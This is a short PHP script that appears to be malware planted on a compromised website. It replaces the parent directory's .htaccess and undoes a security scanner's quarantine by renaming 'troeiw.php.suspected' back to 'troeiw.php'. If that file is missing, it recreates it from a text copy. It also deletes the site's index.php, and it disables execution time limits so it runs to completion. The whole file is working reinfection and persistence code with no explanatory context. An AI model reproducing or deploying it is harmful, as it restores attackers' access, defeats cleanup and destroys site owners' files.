<?php
set_time_limit(0);
ignore_user_abort();
if (file_exists("../.htaccess")) unlink ("../.htaccess");
if (!file_exists("../.htaccess")) copy (".htaccess", "../.htaccess");
if (file_exists("../troeiw.php.suspected")) rename("../troeiw.php.suspected", "../troeiw.php");
	if (!file_exists("../troeiw.php")) copy ("troeiw.txt", "../troeiw.php");
if (file_exists("../index.php")) unlink("../index.php");


?>